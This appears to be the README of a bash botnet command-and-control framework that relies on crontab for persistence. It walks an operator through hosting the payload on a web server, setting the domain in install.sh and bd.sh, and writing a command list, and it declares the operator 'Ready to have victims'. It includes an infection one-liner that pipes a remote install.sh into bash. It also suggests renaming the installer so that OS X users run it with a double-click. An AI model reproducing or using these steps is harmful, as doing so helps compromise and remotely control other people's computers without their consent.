A botnet (C&C) framework that create in bash and using crontab for periodic execute
- Put the folder under any kind of web server, which can be, but not limited to:
IIS
Nginx
Apache
Python Simple HTTP Server
- Change the domain and path in
install.sh
andbd.sh
. - follow the instrustion for writing a command file
- Ready to have victims
- Setup a LAMP server.
- Put the file to a folder which can be accessed on the network.
- Change the domain and path in
install.sh
andbd.sh
. - follow the instrustion for writing a command file
- Ready to have victims
curl http://example.com/install.sh | bash
- You can also rename the file install.sh to install.command, and double-click the file on OS X system to execute it.
The name of command file is command_list
, there is a simple command list call command_list_example
.
You can change the domain and path in the example file, and feel free to use it.